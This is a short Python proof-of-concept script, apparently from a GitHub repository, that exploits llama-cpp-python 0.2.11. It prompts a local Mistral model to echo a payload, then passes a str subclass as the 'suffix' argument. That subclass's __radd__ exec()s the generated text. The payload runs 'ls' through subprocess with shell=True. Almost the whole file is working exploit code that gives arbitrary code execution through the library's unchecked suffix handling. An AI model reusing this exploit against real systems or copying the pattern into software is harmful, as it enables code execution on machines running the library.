-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.py
More file actions
48 lines (40 loc) · 1.1 KB
/
exploit.py
File metadata and controls
48 lines (40 loc) · 1.1 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
from llama_cpp import Llama

# Load the local quantized Mistral model with a 4k-token context window.
context_size = 4096
llm = Llama(
    model_path='mistral-7b-v0.1.Q5_K_M.gguf',
    n_ctx=context_size,
    verbose=False,
)

#
# code payload — the snippet the model is asked to echo back verbatim;
# when exec'd it binds `value` to the output of `ls`
#
code = '\n'.join([
    "import subprocess",
    "value = subprocess.check_output('ls', shell=True).decode()",
])
code_tokens = llm.tokenize(code.encode())

#
# prompt — instructs the model to return the payload unchanged
#
prompt = f'''You just write Python code exactly as provided by User without any modification, explanations or comments. You are short and concise.
<conversation>
Code for function `analyze_data`:
{code}
</conversation>
Return the updated code:
'''
#
# use suffix for exploiting llama_cpp
# llama-cpp-python==0.2.11 does not check type of suffix, so any object is
# concatenated onto the generated text; a str subclass with a custom
# __radd__ therefore gets its own code run inside the library.
#
class SuffixExploit(str):
    """str subclass whose reflected add exec()s the text it is appended to.

    When the library evaluates ``generated_text + suffix``, Python gives
    priority to the subclass's ``__radd__``, which executes the generated
    text as Python code and then returns it unchanged so the caller sees
    no suffix appended.
    """

    def __radd__(self, other: str) -> str:
        # execute exploit code: run the model output as Python.
        # The payload is expected to bind a variable named `value`
        # (a missing `value` would raise KeyError below — intentional
        # for this PoC, since the prompt pins the payload).
        globals_ = {}  # fixed typo: was misspelled `globlas_`
        locals_ = {}
        exec(other, globals_, locals_)
        print('exploit:')
        print(locals_['value'])
        # return other without suffix
        return other
#
# run — trigger the completion; the malicious suffix fires when the
# library concatenates it onto the generated text
#
malicious_suffix = SuffixExploit()
token_budget = len(code_tokens)
output = llm(
    prompt,
    suffix=malicious_suffix,
    temperature=0.1,
    max_tokens=token_budget,
    echo=False,
)
print(output)